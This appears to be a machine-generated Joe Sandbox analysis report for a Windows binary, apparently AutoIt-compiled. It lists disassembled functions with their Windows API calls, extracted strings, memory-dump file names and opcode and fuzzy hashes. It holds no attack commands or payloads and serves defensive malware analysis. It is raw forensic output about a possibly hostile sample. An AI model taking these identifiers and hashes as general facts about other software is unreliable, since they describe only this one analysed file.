                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD869F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: f05af9ff87271f13b1bdf89589c075423c6d09ec546c9d7f01ba6e697ec032e3
                                                                                                                        • Instruction ID: bb584deb9c2315bc7b888afba1eac7a27c3788d28b3cf249b2debc4fe54ea2a3
                                                                                                                        • Opcode Fuzzy Hash: f05af9ff87271f13b1bdf89589c075423c6d09ec546c9d7f01ba6e697ec032e3
                                                                                                                        • Instruction Fuzzy Hash: 84F04471200305BFD7325F65DC88E673BADEF497A4F140016F545C7240CA65DD41EB60
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00FDC6BA
                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FDC6D1
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00FDC6E9
                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00FDC705
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00FDC71F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3741023627-0
                                                                                                                        • Opcode ID: 265a7514dab0a31cac5bd5facf113c1ede32236fa8a179f20d57414f264f2657
                                                                                                                        • Instruction ID: 59449d79d83db8689acc95ffb74e9eabc472f4f4b0ba562eda829d4a89f4b1e4
                                                                                                                        • Opcode Fuzzy Hash: 265a7514dab0a31cac5bd5facf113c1ede32236fa8a179f20d57414f264f2657
                                                                                                                        • Instruction Fuzzy Hash: 1D01A23040030AABEB326B20DC4EF9677B9FF04705F08065AF586A11D0DBE5A954EF80
                                                                                                                        APIs
                                                                                                                        • EndPath.GDI32(?), ref: 00F813BF
                                                                                                                        • StrokeAndFillPath.GDI32(?,?,00FBBAD8,00000000,?), ref: 00F813DB
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00F813EE
                                                                                                                        • DeleteObject.GDI32 ref: 00F81401
                                                                                                                        • StrokePath.GDI32(?), ref: 00F8141C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2625713937-0
                                                                                                                        • Opcode ID: 378874a3e72bf999f1ec5d39de9d8390acb326f220c11b12eae773419e2329c8
                                                                                                                        • Instruction ID: a2d6fb273c3265d5f9d7e150a84ab2e2e06c3fffd68a3a4635a04da644e290e0
                                                                                                                        • Opcode Fuzzy Hash: 378874a3e72bf999f1ec5d39de9d8390acb326f220c11b12eae773419e2329c8
                                                                                                                        • Instruction Fuzzy Hash: DAF0CDF40043099BEB329F56E94C7943BA8B702326F14C318F4A9454E8D73B4596EF50
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00FEC69D
                                                                                                                        • CoCreateInstance.OLE32(01012D6C,00000000,00000001,01012BDC,?), ref: 00FEC6B5
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                        • CoUninitialize.OLE32 ref: 00FEC922
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 2683427295-24824748
                                                                                                                        • Opcode ID: d8febb50b732448c9eca1f6f118777bc9086149d19136602dd940bc0d6e8e8a4
                                                                                                                        • Instruction ID: 99fde1238aeca51bc4663c5d06921d565b61e248d1628e25d6d4078496ce6747
                                                                                                                        • Opcode Fuzzy Hash: d8febb50b732448c9eca1f6f118777bc9086149d19136602dd940bc0d6e8e8a4
                                                                                                                        • Instruction Fuzzy Hash: AAA11871108205AFD304FF64CC81EABB7E8EF84704F14491DF1969B192EBB5EA49DB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FA0FF6: std::exception::exception.LIBCMT ref: 00FA102C
                                                                                                                          • Part of subcall function 00FA0FF6: __CxxThrowException@8.LIBCMT ref: 00FA1041
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                          • Part of subcall function 00F87BB1: _memmove.LIBCMT ref: 00F87C0B
                                                                                                                        • __swprintf.LIBCMT ref: 00F9302D
                                                                                                                        Strings
                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F92EC6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                        • API String ID: 1943609520-557222456
                                                                                                                        • Opcode ID: 03c31b0acffa6c49de78829a031136d594d1e5b91ca4f755a84e058121f5198d
                                                                                                                        • Instruction ID: 8a5638b32bc4859c7f01ce778929dde7bfdaf1fc61b7353b741ed7993144550e
                                                                                                                        • Opcode Fuzzy Hash: 03c31b0acffa6c49de78829a031136d594d1e5b91ca4f755a84e058121f5198d
                                                                                                                        • Instruction Fuzzy Hash: 23918B715083019FDB18FF24DD86DAEB7A4EF85750F00491DF4829B2A1EB28EE44EB52
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00FEBC26
                                                                                                                        • CoCreateInstance.OLE32(01012D6C,00000000,00000001,01012BDC,?), ref: 00FEBC3F
                                                                                                                        • CoUninitialize.OLE32 ref: 00FEBC5C
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 2126378814-24824748
                                                                                                                        • Opcode ID: f655593abfadbffce2317cde34ee5a72f6bf16dd8e74760850a1ecb1f8735c3e
                                                                                                                        • Instruction ID: 4da29c7a50aedfb8a3f38efb40d66e8782f4e6c4c6fe51613b04c4fac1aa3e90
                                                                                                                        • Opcode Fuzzy Hash: f655593abfadbffce2317cde34ee5a72f6bf16dd8e74760850a1ecb1f8735c3e
                                                                                                                        • Instruction Fuzzy Hash: 4BA178756043419FCB10EF15C884E6ABBE5FF88324F148988F89A9B361CB35ED45DB91
                                                                                                                        APIs
                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00FA52DD
                                                                                                                          • Part of subcall function 00FB0340: __87except.LIBCMT ref: 00FB037B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorHandling__87except__start
                                                                                                                        • String ID: pow
                                                                                                                        • API String ID: 2905807303-2276729525
                                                                                                                        • Opcode ID: 1ebb7cecc3f98379ea4a98cdd3818ab9dbeddd2dcd914012d13f01502ded013a
                                                                                                                        • Instruction ID: 2edfc4ad46a49e2dd8f702213e0e25a5794323462b3fc0860e7a82f7cdd9031e
                                                                                                                        • Opcode Fuzzy Hash: 1ebb7cecc3f98379ea4a98cdd3818ab9dbeddd2dcd914012d13f01502ded013a
                                                                                                                        • Instruction Fuzzy Hash: BF517AB1E08701D7CB20A615CA413AF3BD4AB41B60F244968E4D5822D9EF7D8CD4BF46
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #$+
                                                                                                                        • API String ID: 0-2552117581
                                                                                                                        • Opcode ID: 55c97e42b56fb793295992775213e6f2aaec253e2a3bdfa54faf21057fe1e7b4
                                                                                                                        • Instruction ID: ff324859526cf54e7c9b51aeda4167d4469b553008fcae376ad19427b9ba1566
                                                                                                                        • Opcode Fuzzy Hash: 55c97e42b56fb793295992775213e6f2aaec253e2a3bdfa54faf21057fe1e7b4
                                                                                                                        • Instruction Fuzzy Hash: F65136759083469FCF25AF28D8886F97BA6EF16720F184056EC919B390CB34DC42E771
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$_memmove
                                                                                                                        • String ID: ERCP
                                                                                                                        • API String ID: 2532777613-1384759551
                                                                                                                        • Opcode ID: 3f1fcdfc9957e6bdad64b51c0fcb700ebd8e388c718890987086ffdba84342fd
                                                                                                                        • Instruction ID: 71e0880cff186751283bee0a8e9e7bdaba196a09020eac6650bab1609286bab6
                                                                                                                        • Opcode Fuzzy Hash: 3f1fcdfc9957e6bdad64b51c0fcb700ebd8e388c718890987086ffdba84342fd
                                                                                                                        • Instruction Fuzzy Hash: B151B371D00709DBEB24CFA5C881BAABBF8FF44724F24856EE54AC7241E7359584DB40
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0100F910,00000000,?,?,?,?), ref: 01007C4E
                                                                                                                        • GetWindowLongW.USER32 ref: 01007C6B
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01007C7B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long
                                                                                                                        • String ID: SysTreeView32
                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                        • Opcode ID: ccb845863315cf7e0af7be0d2d73c68c59cfacee33c658a3df989edc791e5853
                                                                                                                        • Instruction ID: 33a907b53206b2a8ae16ae35f67a311a84dfbdf240ce545f00beaf7812d1e6ee
                                                                                                                        • Opcode Fuzzy Hash: ccb845863315cf7e0af7be0d2d73c68c59cfacee33c658a3df989edc791e5853
                                                                                                                        • Instruction Fuzzy Hash: 7231923120060AABEB629F38CC41FEA7BA9FB45324F244729F9F5921D1D739F8519B50
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 010076D0
                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 010076E4
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 01007708
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window
                                                                                                                        • String ID: SysMonthCal32
                                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                                        • Opcode ID: b50529c7eabdfafce77dfaf041a04179f3f775a7585a90bc5a370e38bb9d00c6
                                                                                                                        • Instruction ID: 1c192e9b77cc800e3541b7229f51ad7b504652ea913bc162e6496a4262415056
                                                                                                                        • Opcode Fuzzy Hash: b50529c7eabdfafce77dfaf041a04179f3f775a7585a90bc5a370e38bb9d00c6
                                                                                                                        • Instruction Fuzzy Hash: 7421E432500219ABEF22CE54CC42FEA3BA9FB48714F110254FE956B1D0DA75B8519B90
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01006FAA
                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01006FBA
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01006FDF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                        • String ID: Listbox
                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                        • Opcode ID: dfea1ec2695eb41965b721e2716be9c08db770e93e2fc130556773741a542ee3
                                                                                                                        • Instruction ID: 63a979238fd4fe441b4085ff3d52b0116674c9ea42c3ccfe2491874feae64569
                                                                                                                        • Opcode Fuzzy Hash: dfea1ec2695eb41965b721e2716be9c08db770e93e2fc130556773741a542ee3
                                                                                                                        • Instruction Fuzzy Hash: F321B6326101187FEF238F54CC84FBB37AAEF89754F418158F544971D1CA729C6187A0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 010079E1
                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 010079F6
                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01007A03
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                        • Opcode ID: a44b1616b8382384cde655ed151f0642cc9f02d12b09c513e801d332cd45c02b
                                                                                                                        • Instruction ID: ec8c11586498b600b42eb12e165a90373996ac814eb0f6b260c1cf2cc3e1c375
                                                                                                                        • Opcode Fuzzy Hash: a44b1616b8382384cde655ed151f0642cc9f02d12b09c513e801d332cd45c02b
                                                                                                                        • Instruction Fuzzy Hash: 1D11E772240208BBEF229E74CC05FDB77A9EFC9764F010519F681A60D1D676E451DB60
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84C2E), ref: 00F84CA3
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F84CB5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                        • Opcode ID: 2b6fc6d53e0668518204696c74174e1ac9bb8e23f4faed0b3aa323dfc49e5ba4
                                                                                                                        • Instruction ID: af5e986449b2f6826fa7e2cd02dd0346c59e96f3f26550c891c34e35ff91b70f
                                                                                                                        • Opcode Fuzzy Hash: 2b6fc6d53e0668518204696c74174e1ac9bb8e23f4faed0b3aa323dfc49e5ba4
                                                                                                                        • Instruction Fuzzy Hash: D9D01230911723CFD731AF31D91868676D9AF06751F11882D98C5D6540D678D880EB50
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84CE1,?), ref: 00F84DA2
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F84DB4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 2574300362-1355242751
                                                                                                                        • Opcode ID: 040dea1d0bb59467e655d15d510bdf6c121e2856e2668b10d6ed10a38766c771
                                                                                                                        • Instruction ID: 2e98767aa02d6b068f0a7c0b6ec39668557b2ba9ce1292de11d145eb91788f3c
                                                                                                                        • Opcode Fuzzy Hash: 040dea1d0bb59467e655d15d510bdf6c121e2856e2668b10d6ed10a38766c771
                                                                                                                        • Instruction Fuzzy Hash: C4D01271950713CFD7319F31D41868676D4AF05355F11882DD8C5D6540D774D880DB50
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84D2E,?,00F84F4F,?,010462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84D6F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F84D81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
